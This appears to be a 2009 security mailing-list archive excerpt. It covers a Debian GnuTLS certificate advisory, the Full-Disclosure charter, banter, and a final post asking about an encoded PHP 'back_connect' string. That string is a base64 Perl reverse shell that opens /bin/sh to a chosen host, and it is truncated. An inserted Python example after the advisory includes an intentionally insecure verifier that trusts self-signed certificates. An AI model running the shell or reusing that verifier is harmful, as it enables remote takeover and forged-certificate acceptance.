http://maps.google.com/maps?f=q&hl=en&geocode=&q=W1B+5DL&ie=UTF8&ll=51.510625,-0.136878&spn=0.00629,0.021415&z=16&iwloc=addr
42 Glasshouse St, Piccadilly, W1B 5JY

Doors open from 7:00, speaking starts at 7:30 - please try to be prompt as
some people need to go early to get trains back out of London. We have
private use of the whole of the upstairs until 11:30.

Real ale on draught: Adnams Broadside + Spitfire, 'Buccomb' and 'Doombar'.
Other stuff on draught: Guinness, Staropramen, Hoegaarden, Leffe.
Even more stuff on draught: Becks, Fosters, 1664

Food menu is extensive and most importantly: they do Pie - but they stop
serving at 9pm!

I hope to see you all there!

http://dc4420.org

cheers,
MM

--
"In DEFCON, we have no names..." errr... well, we do... but silly ones...

From secnichebogus at gmail.com Mon Feb 9 18:16:47 2009
From: secnichebogus at gmail.com (Secniche Bogus)
Date: Mon, 9 Feb 2009 23:46:47 +0530
Subject: [Full-disclosure] Aditya K Sood Lame Ass Secjacking.
Message-ID: <5c9b0ff50902091016l16fae952wf7264f884a0424c3@mail.gmail.com>

Phenomenal, Mr. Sood has yet again managed to laugh and fill us with joy.
Perfect example at what level the media and security industry has become a
bit (well quite a bit) of bull-fucken-shit.

i). Click jacking: The new phenomenon of browser security nicely covered
here http://hackademix.net/2009/01/31/all-that-clickjazz.

ii). More enjoyable are the bug discussions.
http://code.google.com/p/chromium/issues/detail?id=2877
http://code.google.com/p/chromium/issues/detail?id=2632

If you look carefully can you see the impatience? Especially the comment
"Your response awaited asap."

Don't worry AKS a.k.a 0kn0ck, we are pretty sure your bogusness is fueled
by media and it, like everything crappy, will continue. Browser DoS is the
new way to go.

WARNING! Adityka K Sood will Secjack everyone ph34r!!!!.

Secniche Bogus
Core Operatives Division of SecNiche Security.

PS: We seriously need to get a life.

From fw at deneb.enyo.de Tue Feb 10 07:00:19 2009
From: fw at deneb.enyo.de (Florian Weimer)
Date: Tue, 10 Feb 2009 08:00:19 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1719-1] New gnutls13 packages fix certificate validation
Message-ID: <87fximdbek.fsf@mid.deneb.enyo.de>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1719-1                  security at debian.org
http://www.debian.org/security/                               Florian Weimer
February 10, 2009                      http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : gnutls13
Vulnerability  : design flaw
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2008-4989
Debian Bug     : 505360

Martin von Gagern discovered that GNUTLS, an implementation of the TLS/SSL
protocol, handles verification of X.509 certificate chains incorrectly if
a self-signed certificate is configured as a trusted certificate. This
could cause clients to accept forged server certificates as genuine.
(CVE-2008-4989)

In addition, this update tightens the checks for X.509v1 certificates,
which causes GNUTLS to reject certain certificate chains it accepted
before. (In certificate chain processing, GNUTLS does not recognize
X.509v1 certificates as valid unless explicitly requested by the
application.)

For the stable distribution (etch), this problem has been fixed in
version 1.4.4-3+etch3.

For the unstable distribution (sid), this problem has been fixed in
version 2.4.2-3 of the gnutls26 package.

We recommend that you upgrade your gnutls13 packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 4.0 alias etch - ------------------------------- Source archives: http://security.debian.org/pool/updates/main/g/gnutls13/gnutls13_1.4.4-3+etch2.dsc Size/MD5 checksum: 967 97d676fb2a9de5a2706da79baf5fc53f http://security.debian.org/pool/updates/main/g/gnutls13/gnutls13_1.4.4-3+etch3.diff.gz Size/MD5 checksum: 20931 d1f9a5483e2ff3b6f799f14cc90e0ba4 http://security.debian.org/pool/updates/main/g/gnutls13/gnutls13_1.4.4.orig.tar.gz Size/MD5 checksum: 4752009 c06ada020e2b69caa51833175d59f8b2 http://security.debian.org/pool/updates/main/g/gnutls13/gnutls13_1.4.4-3+etch2.diff.gz Size/MD5 checksum: 19550 d362897a57e2bac2f059413ea29540be http://security.debian.org/pool/updates/main/g/gnutls13/gnutls13_1.4.4-3+etch3.dsc Size/MD5 checksum: 967 c523874d91b1d19b0a59c6d51ada21e6 Architecture independent packages: http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-doc_1.4.4-3+etch2_all.deb Size/MD5 checksum: 2315360 2892fedc83604472a40cb9e16b64fad2 http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-doc_1.4.4-3+etch3_all.deb Size/MD5 checksum: 2315508 9fe5532897a55d3f8b2954a7294920e1 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch3_alpha.deb Size/MD5 checksum: 328102 19e0618dac4d13a9d284019365ef07f9 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch2_alpha.deb Size/MD5 checksum: 547328 0fc6cb94c0a9b65067fc17e0db0e4e7c http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch2_alpha.deb Size/MD5 checksum: 523950 a149137fe64abc4b7e33d66e1345b9c0 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch3_alpha.deb Size/MD5 checksum: 524034 0d510406095b7f9bf9dd06b74502c94a http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch2_alpha.deb Size/MD5 checksum: 327990 8b39649670392f353c183032aab1040b 
http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch3_alpha.deb Size/MD5 checksum: 547418 fd17990e04770d7447e6fd136cb0f726 http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch2_alpha.deb Size/MD5 checksum: 196336 a2385c40d8118a84442449d7720d4437 http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch3_alpha.deb Size/MD5 checksum: 196416 9b570f6739f2071ef8e857f897b0fe73 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch3_amd64.deb Size/MD5 checksum: 314678 9a2fca4364ab01e77da051e1c637cace http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch2_amd64.deb Size/MD5 checksum: 538540 9bad40a6891bacf73ab92d492946439e http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch2_amd64.deb Size/MD5 checksum: 183432 04c381e380452347c0b8c866cd32a0d1 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch2_amd64.deb Size/MD5 checksum: 314542 bd3466107c5a3e81bae9fc6ce16b3f07 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch3_amd64.deb Size/MD5 checksum: 389192 7e1f1ee9b50dbe59303ee92d06d638f9 http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch3_amd64.deb Size/MD5 checksum: 183526 deb90128a086f94d4213ae8d0ebb2aac http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch2_amd64.deb Size/MD5 checksum: 389078 937898ee8ebfbb6c96ec327182aa66c9 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch3_amd64.deb Size/MD5 checksum: 538694 30f0f5f5236de80b969ab142003facda arm architecture (ARM) http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch3_arm.deb Size/MD5 checksum: 355130 d314daec4d8653d21f5aa755b133ce44 http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch2_arm.deb Size/MD5 checksum: 
169734 a0760138aa40ef409bebc45f21482fa6 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch3_arm.deb Size/MD5 checksum: 283218 86a51ac92283cf4d41f8b80e208d3ea0 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch2_arm.deb Size/MD5 checksum: 283146 490e93a8fb47792bab27befcfaba59c4 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch2_arm.deb Size/MD5 checksum: 510986 734ae4e95a95858b98a9aadf3df89e27 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch2_arm.deb Size/MD5 checksum: 355034 d2fad7c1fa481c311272a033a1632baa http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch3_arm.deb Size/MD5 checksum: 511146 020e108874b330b04d28cbf111e1cb3c http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch3_arm.deb Size/MD5 checksum: 169790 d7904cea32e23dcd2abe3c8078029f24 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch2_hppa.deb Size/MD5 checksum: 435274 a50a1b0396725750c7f9b18f42ed59df http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch3_hppa.deb Size/MD5 checksum: 521900 81a5514ae8b882945c9d86260a985075 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch2_hppa.deb Size/MD5 checksum: 312696 9b01cc660ec19e94365cfe9485e69504 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch3_hppa.deb Size/MD5 checksum: 435428 b9b85897a5fa12e6145e44f1d811faf7 http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch2_hppa.deb Size/MD5 checksum: 184434 3fe517f3ae76a0bb39ef2112259ee533 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch3_hppa.deb Size/MD5 checksum: 312786 7bf4a07c716180831b812024f9dc2bed http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch2_hppa.deb Size/MD5 checksum: 
521782 ec2e351f911c06d10a906e35e87b17d8 http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch3_hppa.deb Size/MD5 checksum: 184514 4a4436b484d0809e458fccd777af41a9 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch3_i386.deb Size/MD5 checksum: 525932 03fdffd511056bb48f00fd29a7ff0994 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch3_i386.deb Size/MD5 checksum: 282696 8e5d7e93c2bcd0e5b1c11b2bb76febc1 http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch2_i386.deb Size/MD5 checksum: 171836 c7de8edce99f98a92597328a828306f4 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch3_i386.deb Size/MD5 checksum: 359008 b2d4fb0470fb4933e9d7f7e4d365fade http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch2_i386.deb Size/MD5 checksum: 358910 d3784c1606616b1053afe805e466d351 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch2_i386.deb Size/MD5 checksum: 282576 089b077a2856c2eb240d8ec91e34da98 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch2_i386.deb Size/MD5 checksum: 525814 236abc7e944de62b1c63ac2752df59d5 http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch3_i386.deb Size/MD5 checksum: 171916 2c30fca77e49ece3c874923597113e84 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch3_ia64.deb Size/MD5 checksum: 229224 a8b557d93ac98d96b69e83a1ab0abe60 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch2_ia64.deb Size/MD5 checksum: 550142 eca44ae7ad3a622ae835bad66076bb44 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch3_ia64.deb Size/MD5 checksum: 528174 cb2e8a474b0f616ebdb4f7c70884a68b 
http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch2_ia64.deb Size/MD5 checksum: 229130 48c1beb6eec250eb2ef18978cb7002a7 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch3_ia64.deb Size/MD5 checksum: 394824 b83e917ffa852e371713c05eed6bb2ea http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch2_ia64.deb Size/MD5 checksum: 528024 4911b942fdb28257ce5404e0db59bf8f http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch3_ia64.deb Size/MD5 checksum: 550282 bb35e15bed0cd0a002c09c2a33f204e3 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch2_ia64.deb Size/MD5 checksum: 394664 83b0fb175ce0a9228ae66a1c2c20087d mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch3_mips.deb Size/MD5 checksum: 278098 839af8690670ae34de6ec1c4ecb2a11d http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch2_mips.deb Size/MD5 checksum: 417930 09a97882ea70cea64f7ab518f872d0d4 http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch2_mips.deb Size/MD5 checksum: 181744 14f8d0bcae552215223083475fc102ff http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch2_mips.deb Size/MD5 checksum: 277980 176ba4c110568718f5310ebd88c0fad2 http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch3_mips.deb Size/MD5 checksum: 181844 1063e31ebfce35d017cc2f52f43e7988 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch2_mips.deb Size/MD5 checksum: 552678 75998b98481a61f619a59fdcb195e92a http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch3_mips.deb Size/MD5 checksum: 418000 6de735e5e2f89169cff80b7c88124d7c http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch3_mips.deb Size/MD5 checksum: 552848 
e7a3675995e3f76753683bd56559c097 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch3_mipsel.deb Size/MD5 checksum: 277818 23b61680ae1ebd6e8352efd69369a54d http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch3_mipsel.deb Size/MD5 checksum: 541908 5ce5c90c1938eab0e66df230cb92b99f http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch2_mipsel.deb Size/MD5 checksum: 541770 b1a12727513f82602064e9d9d0238d4e http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch3_mipsel.deb Size/MD5 checksum: 182774 ebde66ae73e094da31b94a72b4214591 http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch2_mipsel.deb Size/MD5 checksum: 182702 5bc323ab598389c3e074f28b54d84b84 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch2_mipsel.deb Size/MD5 checksum: 277736 582f2204399dfecd750f9f93a3f395d1 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch2_mipsel.deb Size/MD5 checksum: 417036 d94700c36580f967644d95de26672633 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch3_mipsel.deb Size/MD5 checksum: 417180 6e5c825f8843d10a312a791b7bb7e1cf powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch2_powerpc.deb Size/MD5 checksum: 184590 c5a0ea676820713de26aec86ade8c61b http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch3_powerpc.deb Size/MD5 checksum: 184672 f8dc6ea415ba64b863f54c83eb948f4d http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch2_powerpc.deb Size/MD5 checksum: 388752 c1a798145290881a103431c0e61b89b5 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch2_powerpc.deb Size/MD5 checksum: 538638 e78c7fd529dc9b84834d868d6d3abdbf 
http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch3_powerpc.deb Size/MD5 checksum: 288958 78c75eed0f9943eebd81c197381dbf5c http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch3_powerpc.deb Size/MD5 checksum: 538788 5435fb5147d931b8386eacc607a23dfc http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch2_powerpc.deb Size/MD5 checksum: 288854 73dd971eb95f10766b75938e531b850f http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch3_powerpc.deb Size/MD5 checksum: 388886 9b17d971390abcda56a1dae375bb57f8 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch3_s390.deb Size/MD5 checksum: 311694 6249eb1de5c7350957867560879ab144 http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch3_s390.deb Size/MD5 checksum: 184588 6350de7268b17a8698ff11f5054c6e4a http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch2_s390.deb Size/MD5 checksum: 537386 f2daa306f4815cfc6e147b89b2c9f836 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch2_s390.deb Size/MD5 checksum: 380158 1e7bdd0dd3de68c319a38071814bcf25 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch3_s390.deb Size/MD5 checksum: 537530 9c94d38e0969a1a3ade7340623de07c0 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch3_s390.deb Size/MD5 checksum: 380300 2761ba52e1fb0b7e8f899b5c24121159 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch2_s390.deb Size/MD5 checksum: 311354 7a314e4d02c883e281f4eafe25f04d31 http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch2_s390.deb Size/MD5 checksum: 184510 05b634e19e7e85d994d5625dda5e6c52 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch3_sparc.deb 
Size/MD5 checksum: 378986 3b732e25a6bcd5c2300af4820553516f http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch2_sparc.deb Size/MD5 checksum: 169598 34390667473c6d12097ede5c2c3c3610 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch2_sparc.deb Size/MD5 checksum: 271000 1c5024b2fd07ef8c98276afa17fac00b http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch3_sparc.deb Size/MD5 checksum: 169682 58c18c588e2e09bb97ace63713a8accf http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch2_sparc.deb Size/MD5 checksum: 378848 1d86c8b4356b8be1cb6a31620469bada http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch2_sparc.deb Size/MD5 checksum: 491096 672ae9d75e0071ced67518ee05ae3733 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch3_sparc.deb Size/MD5 checksum: 271146 74514dfa3c95b1afe4388cc31bc4cba5 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch3_sparc.deb Size/MD5 checksum: 491162 0dbc5d0426b64b4abff5acdabb2c42f0 These files will probably be moved into the stable distribution on its next update. 
- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iQEcBAEBAgAGBQJJkSYVAAoJEL97/wQC1SS+Nc4H/2TnDuV0VpsjmK/uRsQx99R/
bUkz4ZcTFzMP5VztCE4gNMy0UmVNyk6mtu87L2Md0JnHWPU3xY7+2ZZFZ6DfjUpQ
7GGwl4DN6y3ge2/F2QIMid3iSolJaXQ2lkj/50OelS/MwTTDNQ6Q5W6SFet40SOr
rCRDLQFCW7mgkCPa9v+meXWRy1wuSx6h5UAr6wMIy0Z/20BrQtS+8hyHxOHtxbGQ
FhFMa3n6KySUt9JbJ7QipSBxIqn2oTmaNy4AL3W5dpGY7UEoBxQ/67S2hAnhoTZH
i7ipu3PQMWX+ov1uyIe3EEQmIQpfyHA3EwKujJNIozI88NeuWdJF18AIbuQrodo=
=N+Yn
-----END PGP SIGNATURE-----

From johnc at grok.org.uk Tue Feb 10 13:30:16 2009
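The advisory states which property GnuTLS got wrong (trust anchored on a self-signed certificate) but not the mechanism, so the following is an added illustration, not GnuTLS or Debian code, of what a correct chain verifier has to enforce: a chain is accepted only when it reaches a certificate that is actually in the configured trust store, a self-signed certificate at the end of the chain proves nothing by itself, and X.509v1 certificates are not accepted as CAs unless the application asks for it. Everything in it is constructed for the example: the `Cert` model, `make_cert`, `verify_chain`, the `demo` PKI, and an HMAC-keyed stand-in for public-key signatures so it runs with the standard library alone. `verify_chain_naive` is a constructed contrast showing the class of mistake, not a description of the GnuTLS defect.

```python
import hashlib
import hmac
from dataclasses import dataclass
from typing import List, Set, Tuple


@dataclass(frozen=True)
class Cert:
    """Minimal certificate model (constructed for this example)."""
    subject: str
    issuer: str
    version: int      # 1 for X.509v1, 3 for X.509v3
    key: bytes        # stands in for the certified public key
    signature: bytes  # made by the issuer over tbs()

    def tbs(self) -> bytes:
        # the "to-be-signed" part: every field except the signature
        return f"{self.subject}|{self.issuer}|{self.version}|".encode() + self.key


def sign(tbs: bytes, issuer_key: bytes) -> bytes:
    # Model signature: HMAC-SHA256 keyed with the issuer's key plays the role
    # of a public-key signature so the example runs with the stdlib only.
    return hmac.new(issuer_key, tbs, hashlib.sha256).digest()


def make_cert(subject: str, issuer: str, version: int, key: bytes, issuer_key: bytes) -> Cert:
    tbs = f"{subject}|{issuer}|{version}|".encode() + key
    return Cert(subject, issuer, version, key, sign(tbs, issuer_key))


def signature_ok(cert: Cert, issuer: Cert) -> bool:
    return cert.issuer == issuer.subject and hmac.compare_digest(
        sign(cert.tbs(), issuer.key), cert.signature)


def verify_chain(chain: List[Cert], trust_store: Set[Cert],
                 allow_v1: bool = False) -> Tuple[bool, str]:
    """chain[0] is the end-entity certificate, chain[1:] the CA certificates the
    peer sent (leaf first). Trust comes only from membership in trust_store."""
    if not chain:
        return False, "empty chain"
    for i, cert in enumerate(chain):
        if cert in trust_store:
            # Reached a configured anchor; every link below it was checked already.
            return True, f"anchored at trusted certificate {cert.subject!r}"
        if i > 0 and cert.version == 1 and not allow_v1:
            # Mirrors the advisory's note: v1 certificates are not accepted as
            # CAs in chain processing unless the application asks for it.
            return False, f"X.509v1 certificate {cert.subject!r} not accepted as a CA"
        if i + 1 < len(chain):
            issuers = [chain[i + 1]]
        else:
            # Peer did not send the anchor: look it up by name in the trust store.
            issuers = [t for t in trust_store if t.subject == cert.issuer]
            if not issuers:
                # A self-signed last certificate is not a trust decision.
                return False, f"chain ends at {cert.subject!r}, which is not trusted"
        if not any(signature_ok(cert, iss) for iss in issuers):
            return False, f"signature on {cert.subject!r} not made by its claimed issuer"
        if i + 1 == len(chain):
            return True, f"anchored at trusted certificate {cert.issuer!r}"
    return False, "unreachable"


def verify_chain_naive(chain: List[Cert], trust_store: Set[Cert]) -> Tuple[bool, str]:
    """Constructed contrast (not GnuTLS code): promotes a self-signed last
    certificate to an anchor without checking the trust store."""
    last = chain[-1]
    anchors = set(trust_store)
    if last.subject == last.issuer and signature_ok(last, last):
        anchors.add(last)  # the mistake: trusting it because it is self-signed
    return verify_chain(chain, anchors)


def demo() -> dict:
    # Constructed PKI: one trusted root, one issuing CA, one server certificate.
    root = make_cert("Example Root CA", "Example Root CA", 3, b"root-key", b"root-key")
    inter = make_cert("Example Issuing CA", root.subject, 3, b"inter-key", root.key)
    leaf = make_cert("www.example.test", inter.subject, 3, b"leaf-key", inter.key)
    trust = {root}
    # Forged: attacker-made self-signed root and a server certificate under it.
    evil_root = make_cert("Evil Root", "Evil Root", 3, b"evil-key", b"evil-key")
    evil_leaf = make_cert("www.example.test", evil_root.subject, 3, b"e-leaf", evil_root.key)
    # A legitimately signed but X.509v1 intermediate.
    legacy = make_cert("Legacy CA", root.subject, 1, b"v1-key", root.key)
    legacy_leaf = make_cert("legacy.example.test", legacy.subject, 3, b"l-key", legacy.key)
    return {
        "good_chain_without_root": verify_chain([leaf, inter], trust)[0],
        "good_chain_with_root": verify_chain([leaf, inter, root], trust)[0],
        "forged_chain_strict": verify_chain([evil_leaf, evil_root], trust)[0],
        "forged_chain_naive": verify_chain_naive([evil_leaf, evil_root], trust)[0],
        "v1_intermediate_default": verify_chain([legacy_leaf, legacy], trust)[0],
        "v1_intermediate_allowed": verify_chain([legacy_leaf, legacy], trust, allow_v1=True)[0],
    }


if __name__ == "__main__":
    for name, accepted in demo().items():
        print(f"{name:26s} {'ACCEPT' if accepted else 'REJECT'}")
```

The forged chain is the case the advisory warns about: the naive verifier accepts it because the last certificate happens to be self-signed, the strict one rejects it because nothing in the chain is in the trust store. The v1 cases show the second, stricter change in the update: the same legitimately signed intermediate is rejected by default and accepted only when the application opts in.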
From: johnc at grok.org.uk (John Cartwright)
Date: Tue, 10 Feb 2009 13:30:16 +0000
Subject: [Full-disclosure] List Charter
Message-ID: <20090210133016.GA25865@grok.org.uk>

[Full-Disclosure] Mailing List Charter
John Cartwright

- Introduction & Purpose -

This document serves as a charter for the [Full-Disclosure] mailing list hosted at lists.grok.org.uk.

The list was created on 9th July 2002 by Len Rose, and is primarily concerned with security issues and their discussion. The list is administered by John Cartwright.

The Full-Disclosure list is hosted and sponsored by Secunia.

- Subscription Information -

Subscription/unsubscription may be performed via the HTTP interface located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure.

Alternatively, commands may be emailed to full-disclosure-request at lists.grok.org.uk; send the word 'help' in either the message subject or body for details.

- Moderation & Management -

The [Full-Disclosure] list is unmoderated. Typically posting will be restricted to members only; however, the administrators may choose to accept submissions from non-members based on individual merit and relevance.

It is expected that the list will be largely self-policing; however, in special circumstances (eg spamming, misappropriation) offending members may be removed from the list by the management.

An archive of postings is available at http://lists.grok.org.uk/pipermail/full-disclosure/.

- Acceptable Content -

Any information pertaining to vulnerabilities is acceptable, for instance announcement and discussion thereof, exploit techniques and code, related tools and papers, and other useful information.

Gratuitous advertisement, product placement, or self-promotion is forbidden.

Disagreements, flames, arguments, and off-topic discussion should be taken off-list wherever possible.

Humour is acceptable in moderation, providing it is inoffensive. Politics should be avoided at all costs.

Members are reminded that due to the open nature of the list, they should use discretion in executing any tools or code distributed via this list.

- Posting Guidelines -

The primary language of this list is English. Members are expected to maintain a reasonable standard of netiquette when posting to the list.

Quoting should not exceed that which is necessary to convey context; this is especially relevant to members subscribed to the digested version of the list.

The use of HTML is discouraged, but not forbidden. Signatures will preferably be short and to the point, and those containing 'disclaimers' should be avoided where possible.

Attachments may be included if relevant or necessary (e.g. PGP or S/MIME signatures, proof-of-concept code, etc) but must not be active (in the case of a worm, for example) or malicious to the recipient.

Vacation messages should be carefully configured to avoid replying to list postings. Offenders will be excluded from the mailing list until the problem is corrected.

Members may post to the list by emailing full-disclosure at lists.grok.org.uk. Do not send subscription/unsubscription mails to this address; use the -request address mentioned above.

- Charter Additions/Changes -

The list charter will be published at http://lists.grok.org.uk/full-disclosure-charter.html. In addition, the charter will be posted monthly to the list by the management.

Alterations will be made after consultation with list members and a consensus has been reached.

From staticrez at gmail.com Tue Feb 10 18:23:46 2009
From: staticrez at gmail.com (sr.)
Date: Tue, 10 Feb 2009 13:23:46 -0500
Subject: [Full-disclosure] connect back PHP hack
Message-ID: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com>

can anyone tell me what encoding this is?

$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
